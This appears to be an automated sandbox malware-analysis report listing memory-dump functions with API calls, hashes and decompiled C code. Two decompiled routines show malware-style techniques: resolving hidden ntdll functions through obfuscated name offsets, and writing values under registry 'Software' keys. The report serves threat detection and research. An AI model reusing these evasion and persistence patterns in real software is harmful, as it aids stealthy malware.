Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 49924154ce928171af55a061a59c6c8176aba736179d8005691737b5974d190c
Instruction ID: f5066b518d9d9c0a3de720404b1b4d365698606d5befdf17529573cdd03ff503
Opcode Fuzzy Hash: 49924154ce928171af55a061a59c6c8176aba736179d8005691737b5974d190c
Instruction Fuzzy Hash: 0011843257DB04A6D620EB70CD05FDFB7DC5F08B09F420D19AFAB6A4A1D7A4B5848650

Uniqueness

Uniqueness Score: -1.00%

Function 001F77C0, Relevance: 9.2, APIs: 6, Instructions: 180COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 001F78A7
Concurrency::cancel_current_task.LIBCPMT ref: 001F78AC
Concurrency::cancel_current_task.LIBCPMT ref: 001F78FA
Concurrency::cancel_current_task.LIBCPMT ref: 001F78FF

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 8b24366b41915cdcc0e9f59fbd6bbcb50414f5bc2f74f1893425ee4d20a97c2e
Instruction ID: bb06eae64ecbc43fe7f69a202ef233d84dac970699f379b9d5c39e55506bc38e
Opcode Fuzzy Hash: 8b24366b41915cdcc0e9f59fbd6bbcb50414f5bc2f74f1893425ee4d20a97c2e
Instruction Fuzzy Hash: E0410272A042188BCF28DE68D855A7DB691EF643707284B6DEA26CB2D5E730ED01C781

Uniqueness

Uniqueness Score: -1.00%

Function 0034A76F, Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,00000000,?,?,004D8488), ref: 0034A7B8
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,00000000,?,?,004D8488), ref: 0034A823
LCMapStringEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004D8488), ref: 0034A840
LCMapStringEx.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,004D8488), ref: 0034A87F
LCMapStringEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004D8488), ref: 0034A8DE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,004D8488), ref: 0034A901

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: ae2c33c7003b3588b61775f7f2d63061630db36fdd81f1179632b1106f231369
Instruction ID: 5e1ac44e8f8e5e3b3e345758d199f735e0dedbb9c7ae54660181ebaf1ed57253
Opcode Fuzzy Hash: ae2c33c7003b3588b61775f7f2d63061630db36fdd81f1179632b1106f231369
Instruction Fuzzy Hash: A651D37294060AAFEB224FA0CC45FAB7BF9EF44740F164429F915EE190E731AD11DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6DA860FF, Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6DA72A9E,6DCA72C0,0000000C), ref: 6DA86104
_free.LIBCMT ref: 6DA86161
_free.LIBCMT ref: 6DA86197
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6DA72A9E,6DCA72C0,0000000C), ref: 6DA861A2
_free.LIBCMT ref: 6DA8620C
_free.LIBCMT ref: 6DA86240

Memory Dump Source

Source File: 00000011.00000002.530977415.000000006D851000.00000020.00020000.sdmp, Offset: 6D850000, based on PE: true

Associated: 00000011.00000002.530970653.000000006D850000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531353953.000000006DBC5000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.531449744.000000006DCB0000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531458292.000000006DCB3000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531465886.000000006DCB7000.00000008.00020000.sdmp Download File
Associated: 00000011.00000002.531479113.000000006DCC6000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531486995.000000006DCCA000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.531496032.000000006DCCB000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 7d785bae867d374c3d1f68a85f14e417071d656a98a42e9c34990475b1c41921
Instruction ID: 0864ecb80945b01f81c7847be6662fa6aa6c1b119691ef8f75b3e19e67f08aa2
Opcode Fuzzy Hash: 7d785bae867d374c3d1f68a85f14e417071d656a98a42e9c34990475b1c41921
Instruction Fuzzy Hash: CE310A3597D1126BFA1256685D44F3B2268AB86339F2F0214FF25A73D3EB10CCC141D5

Uniqueness

Uniqueness Score: -1.00%

Function 02CE944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02CE94A4
SysAllocString.OLEAUT32(0070006F), ref: 02CE94B8
SysAllocString.OLEAUT32(00000000), ref: 02CE94CA
SysFreeString.OLEAUT32(00000000), ref: 02CE9532
SysFreeString.OLEAUT32(00000000), ref: 02CE9541
SysFreeString.OLEAUT32(00000000), ref: 02CE954C

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: a972427cbce5877bb9f2160a6c22856484741ba195440afce7bff6899dbd810b
Instruction ID: 8153c64345f3711772f986b59923de8150b03f1779a9aaf45722d768fdc74df4
Opcode Fuzzy Hash: a972427cbce5877bb9f2160a6c22856484741ba195440afce7bff6899dbd810b
Instruction Fuzzy Hash: B1417C36D00609EFDF01DFF8D844AAEB7BAAF88300F144566E911EB220DB71DA05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001DB330, Relevance: 9.1, APIs: 6, Instructions: 118COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001DB370
std::_Lockit::_Lockit.LIBCPMT ref: 001DB392
std::_Lockit::~_Lockit.LIBCPMT ref: 001DB3B2
__Getctype.LIBCPMT ref: 001DB44B
std::_Facet_Register.LIBCPMT ref: 001DB46A
std::_Lockit::~_Lockit.LIBCPMT ref: 001DB482

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 5653b6f0879e31f772b9ef9b91682044068e550f68c55508fe1a8ae6be4faaac
Instruction ID: 1318a10dcc8b0c546429c8e77320cd9a73a60338b9f89c9a7b6aaf5e640e03e4
Opcode Fuzzy Hash: 5653b6f0879e31f772b9ef9b91682044068e550f68c55508fe1a8ae6be4faaac
Instruction Fuzzy Hash: E3418971D04244DBCB15DF58D8C1AAAB7F4EB14710F15816AE846AF392EB30BD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02CE4944, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02CE4944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02CE1525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2ced2a8; // 0xeba5a8
					_t1 = _t23 + 0x2cee11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2ced2a8; // 0xeba5a8
					_t2 = _t26 + 0x2cee769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02CE8B22(_t54);
					} else {
						_t30 =  *0x2ced2a8; // 0xeba5a8
						_t5 = _t30 + 0x2cee756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2ced2a8; // 0xeba5a8
							_t7 = _t33 + 0x2cee40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2ced2a8; // 0xeba5a8
								_t9 = _t36 + 0x2cee4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2ced2a8; // 0xeba5a8
									_t11 = _t39 + 0x2cee779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02CE5CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02ce4953
0x02ce4957
0x02ce4a19
0x02ce495d
0x02ce495d
0x02ce4962
0x02ce4975
0x02ce4977
0x02ce497c
0x02ce4984
0x02ce498b
0x02ce498d
0x02ce4992
0x02ce4a11
0x02ce4a12
0x02ce4994
0x02ce4994
0x02ce4999
0x02ce49a1
0x02ce49a3
0x02ce49a8
0x00000000
0x02ce49aa
0x02ce49aa
0x02ce49af
0x02ce49b7
0x02ce49b9
0x02ce49be
0x00000000
0x02ce49c0
0x02ce49c0
0x02ce49c5
0x02ce49cd
0x02ce49cf
0x02ce49d4
0x00000000
0x02ce49d6
0x02ce49d6
0x02ce49db
0x02ce49e3
0x02ce49e5
0x02ce49ea
0x00000000
0x02ce49ec
0x02ce49f2
0x02ce49f7
0x02ce49fe
0x02ce4a03
0x02ce4a08
0x00000000
0x02ce4a0a
0x02ce4a0d
0x02ce4a0d
0x02ce4a08
0x02ce49ea
0x02ce49d4
0x02ce49be
0x02ce49a8
0x02ce4992
0x02ce4a27

APIs

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02CE34A1,?,00000001,?,?,00000000,00000000), ref: 02CE4969
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02CE498B
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02CE49A1
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02CE49B7
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02CE49CD
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02CE49E3

Part of subcall function 02CE5CD1: memset.NTDLL ref: 02CE5D50

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 68a65f9c6bd6f6e4d424ceb238196e180dd6c7dd759120e89f7d7cae0def23d7
Instruction ID: 0b2910513c2c089ef1538348fabb948a6a8420cce43c67d493e0d291d4a9ab6a
Opcode Fuzzy Hash: 68a65f9c6bd6f6e4d424ceb238196e180dd6c7dd759120e89f7d7cae0def23d7
Instruction Fuzzy Hash: F0214FB158060AEFDF20DF69DC44E5AB7ECEF483547024566EA06DB221E770EE04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0036827E, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00368308

Strings

~c5, xrefs: 00368280

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: _strrchr
String ID: ~c5
API String ID: 3213747228-3108855823
Opcode ID: 3d70a671d251961296ffff5f995b18bfdcba410acef1b5c6997b1f52bd380e0f
Instruction ID: dc11fc345aa5c0468fe68903fca97b038d7fb07646487df463eb929731f85a1d
Opcode Fuzzy Hash: 3d70a671d251961296ffff5f995b18bfdcba410acef1b5c6997b1f52bd380e0f
Instruction Fuzzy Hash: CBB135759002469FDB13CF28C8917AEBBE5EF59340F25C2AAE945AB345DE348D01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0034D7C6, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0034D7BD,0034B65B,00348A1A,004D8488,?,?,?,?,0039A49A,000000FF,?,001BD2A0,?), ref: 0034D7D4
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0034D7E2
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0034D7FB
SetLastError.KERNEL32(00000000,?,0034D7BD,0034B65B,00348A1A,004D8488,?,?,?,?,0039A49A,000000FF,?,001BD2A0,?), ref: 0034D84D

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c4fee3ade384de30702fbdec03085a024ea244861fad1207a8d03744c85c67ca
Instruction ID: 6ba6ac8e72018154fdf561dc4a623ef3769290fc10f55b173a53d41baecf3a64
Opcode Fuzzy Hash: c4fee3ade384de30702fbdec03085a024ea244861fad1207a8d03744c85c67ca
Instruction Fuzzy Hash: F3019A3221B711AEE62727A5BC9697B2B88EB11776B21033EF9108D0F2FF5278059184

Uniqueness

Uniqueness Score: -1.00%

Function 001C0CF0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 213networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 001C0DAF
setsockopt.WS2_32(00000000,00000029,0000001B,?,00000004), ref: 001C0DE8
CreateIoCompletionPort.KERNEL32(00000000,?,00000000,00000000), ref: 001C0E2D
GetLastError.KERNEL32 ref: 001C0E37

Strings

PkH, xrefs: 001C0E5C, 001C0E8F, 001C0F89, 001C0F90

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: CompletionCreateErrorLastPortSocketsetsockopt
String ID: PkH
API String ID: 1324823626-1844677740
Opcode ID: 50b80a9c4044adde3e5adc7d0fdd49f63ace2cb3ff0f44c075dc40a3c8c9d1c4
Instruction ID: d037a37232257b84cd7d76374dd639a06cf3f508489bd912cfc35924a662e0a3
Opcode Fuzzy Hash: 50b80a9c4044adde3e5adc7d0fdd49f63ace2cb3ff0f44c075dc40a3c8c9d1c4
Instruction Fuzzy Hash: C591B271900349DFCB11DFA8D884BAEBBB0EF15324F10865EE8259B391D776E984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02CE4B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02CE4B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2ced33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E02CE7B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02CE8C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02CE8B22(_a8);
						goto L29;
					}
					_t64 =  *0x2ced278; // 0x3ba9d88
					_t16 = _t64 + 0xc; // 0x3ba9eaa
					_t65 = E02CE7B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02cec0
						if(E02CEA38F(_t97,  *_t33, _t91, _a8,  *0x2ced334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2ced2a8; // 0xeba5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2ceea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2cee8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E02CE8F85(_t69,  *0x2ced334,  *0x2ced338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2ced2a8; // 0xeba5a8
									_t44 = _t71 + 0x2cee846; // 0x74666f53
									_t73 = E02CE7B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02cec0
										E02CE4538( *_t47, _t91, _a8,  *0x2ced338, _a24);
										_t49 = _t101 + 0x10; // 0x3d02cec0
										E02CE4538( *_t49, _t91, _t99,  *0x2ced330, _a16);
										E02CE8B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02cec0
									E02CE4538( *_t40, _t91, _a8,  *0x2ced338, _a24);
									_t43 = _t101 + 0x10; // 0x3d02cec0
									E02CE4538( *_t43, _t91, _a8,  *0x2ced330, _a16);
								}
								if( *_t101 != 0) {
									E02CE8B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02cec0
					_t81 = E02CE7DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02cec0
							E02CEA38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02CE8B22(_t100);
						_t98 = _a16;
					}
					E02CE8B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02CEA789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2ced33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02ce4b2a
0x02ce4b33
0x02ce4b3a
0x02ce4b3f
0x02ce4bac
0x02ce4bb2
0x02ce4bb7
0x02ce4bbe
0x02ce4bc3
0x02ce4bc8
0x02ce4d33
0x02ce4d3a
0x02ce4d3a
0x02ce4d3f
0x02ce4d41
0x02ce4d41
0x02ce4d4a
0x02ce4d4a
0x02ce4bce
0x02ce4bda
0x02ce4d29
0x02ce4d2c
0x00000000
0x02ce4d2c
0x02ce4be0
0x02ce4be5
0x02ce4be8
0x02ce4bed
0x02ce4bf2
0x02ce4c3b
0x02ce4c3b
0x02ce4c4e
0x02ce4c58
0x02ce4c5e
0x02ce4c65
0x02ce4c6f
0x02ce4c6f
0x02ce4c67
0x02ce4c67
0x02ce4c67
0x02ce4c67
0x02ce4c91
0x02ce4c99
0x02ce4cc7
0x02ce4ccc
0x02ce4cd3
0x02ce4cd8
0x02ce4cdc
0x02ce4d0e
0x02ce4cde
0x02ce4ceb
0x02ce4cee
0x02ce4cfe
0x02ce4d01
0x02ce4d07
0x02ce4d07
0x02ce4c9b
0x02ce4ca8
0x02ce4cab
0x02ce4cbd
0x02ce4cc0
0x02ce4cc0
0x02ce4d18
0x02ce4d24
0x02ce4d1a
0x02ce4d1d
0x02ce4d1d
0x02ce4d18
0x02ce4c91
0x00000000
0x02ce4c58
0x02ce4c01
0x02ce4c04
0x02ce4c0b
0x02ce4c11
0x02ce4c14
0x02ce4c16
0x02ce4c22
0x02ce4c25
0x02ce4c25
0x02ce4c2b
0x02ce4c30
0x02ce4c30
0x02ce4c36
0x00000000
0x02ce4c36
0x02ce4b44
0x00000000
0x02ce4b6b
0x02ce4b6b
0x02ce4b77
0x02ce4b8a
0x02ce4b90
0x02ce4b98
0x00000000
0x02ce4b98

APIs

StrChrA.SHLWAPI(02CE9900,0000005F,00000000,00000000,00000104), ref: 02CE4B5D
lstrcpy.KERNEL32(?,?), ref: 02CE4B8A

Part of subcall function 02CE7B3B: lstrlen.KERNEL32(?,00000000,03BA9D88,00000000,02CE5142,03BA9FAB,?,?,?,?,?,69B25F44,00000005,02CED00C), ref: 02CE7B42
Part of subcall function 02CE7B3B: mbstowcs.NTDLL ref: 02CE7B6B
Part of subcall function 02CE7B3B: memset.NTDLL ref: 02CE7B7D

Part of subcall function 02CE4538: lstrlenW.KERNEL32(?,?,?,02CE4CF3,3D02CEC0,80000002,02CE9900,02CE5C8D,74666F53,4D4C4B48,02CE5C8D,?,3D02CEC0,80000002,02CE9900,?), ref: 02CE455D

Part of subcall function 02CE8B22: HeapFree.KERNEL32(00000000,00000000,02CE131A,00000000,?,?,00000000), ref: 02CE8B2E

lstrcpy.KERNEL32(?,00000000), ref: 02CE4BAC

Strings

(, xrefs: 02CE4C0D
\, xrefs: 02CE4B90

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 5c12165b6cc9e1644a0e0e4f5d87dcb2823556428fc736c842ad03534f6d7313
Instruction ID: 71935df0afc237efb5e90b39dc13907011c08db1930d3a128fe429646949f3b8
Opcode Fuzzy Hash: 5c12165b6cc9e1644a0e0e4f5d87dcb2823556428fc736c842ad03534f6d7313
Instruction Fuzzy Hash: 2F513B75500609EFDF25AF60DD40EAE7BBAEF44304F008A54F9179A160D735DA65EF10

Uniqueness

Uniqueness Score: -1.00%

Function 001C8550, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 001C8608

Part of subcall function 001DEB10: ___std_exception_copy.LIBVCRUNTIME ref: 001DEB52
Part of subcall function 001DEB10: ___std_exception_copy.LIBVCRUNTIME ref: 001DEBC2

Part of subcall function 001C7C70: SetEvent.KERNEL32(00000000,004D8488), ref: 001C7D11

___std_exception_destroy.LIBVCRUNTIME ref: 001C8637

Part of subcall function 001C7B50: SetEvent.KERNEL32(00000000), ref: 001C7C14

___std_exception_copy.LIBVCRUNTIME ref: 001C86A1
___std_exception_destroy.LIBVCRUNTIME ref: 001C86D0

Strings

pmH, xrefs: 001C86AD

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ___std_exception_copy$Event___std_exception_destroy
String ID: pmH
API String ID: 3653323322-65301770
Opcode ID: 57634f8401522e0eae7768f2834aae4b9b191cecd08f8fb4641ad44def9b07ce
Instruction ID: b6ec34d42f21af694bb7bb72671798b4b04f5fbc3994d0f63265d5a9c152083e
Opcode Fuzzy Hash: 57634f8401522e0eae7768f2834aae4b9b191cecd08f8fb4641ad44def9b07ce
Instruction Fuzzy Hash: 3D51DA70A01208DFCB15DFA4D884BAEBBF5AF15314F24461EE405AB381EB74AA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001BEE70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 001BEEB8
closesocket.WS2_32 ref: 001BEECE
ioctlsocket.WS2_32(?,8004667E,?), ref: 001BEF3D
closesocket.WS2_32 ref: 001BEF4A

Strings

PkH, xrefs: 001BEE93

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: closesocket$ioctlsocketsetsockopt
String ID: PkH
API String ID: 566113833-1844677740
Opcode ID: 50483d5fe4daae072ced2ff5a3288b318afb90fded556c0405e5029d4ecc4ab5
Instruction ID: 537ec9638eedc1670f160f3c1a21e49a3c91471eea16bbeacaa7f25c882de657
Opcode Fuzzy Hash: 50483d5fe4daae072ced2ff5a3288b318afb90fded556c0405e5029d4ecc4ab5
Instruction Fuzzy Hash: 8E31DD719002059BCB11DF68D8889EDFBE8EF05761F1446AAF805EB391D774DD54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0036398E, Relevance: 7.8, APIs: 5, Instructions: 255COMMON

Download Yara Rule

APIs

Part of subcall function 00366300: GetLastError.KERNEL32(00000000,00000000,00000004,003567A2,00000000,00000000,00000000,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 00366305
Part of subcall function 00366300: SetLastError.KERNEL32(00000000,004D88A0,000000FF,?,0036A292,00000000,00000000,?,004EAB34,00000000), ref: 003663A3

_free.LIBCMT ref: 00363C79
_free.LIBCMT ref: 00363C92
_free.LIBCMT ref: 00363CD0
_free.LIBCMT ref: 00363CD9
_free.LIBCMT ref: 00363CE5

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 0a866bab028f54232f6e6e8657b2943e1ff766a312e921f62481f54e8482535f
Instruction ID: 6f304c5f9d043a9c7895f5823b685145a18aa431de033e0239abf135d5139f63
Opcode Fuzzy Hash: 0a866bab028f54232f6e6e8657b2943e1ff766a312e921f62481f54e8482535f
Instruction Fuzzy Hash: 98B16C75A01619DFDB25DF18C884AADB7B4FF48304F5185AEE84AA7394E770AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002054A0, Relevance: 7.7, APIs: 5, Instructions: 238timeCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 0020558A
ReleaseSemaphore.KERNEL32(?,?,?,?,?,001C4F0B), ref: 002055B1
CloseHandle.KERNEL32(?), ref: 002055E5
SetEvent.KERNEL32(00000000), ref: 002056A3
SetWaitableTimer.KERNEL32(?,?,?,?,?,00000000,004D8488), ref: 00205776

Memory Dump Source

Source File: 00000011.00000002.525871274.00000000001AF000.00000080.00020000.sdmp, Offset: 001AF000, based on PE: false

Similarity

API ID: ReleaseSemaphore$CloseEventHandleTimerWaitable
String ID:
API String ID: 765751747-0
Opcode ID: 2e70a91603364ac83691a9d578e2652f0103e3d935bfbff25eb3bf82d6fc6307
Instruction ID: 1383e657ae36f7cab55cdc82ed251cf328068ae2d6e14760fcddce6b8a7dff41
Opcode Fuzzy Hash: 2e70a91603364ac83691a9d578e2652f0103e3d935bfbff25eb3bf82d6fc6307
Instruction Fuzzy Hash: 1F819FB0910B258FDF25DF68D88475EBBA9AF09324F640259E814AB3D2CB35DC50CFA1

Uniqueness

Uniqueness Score: -1.00%

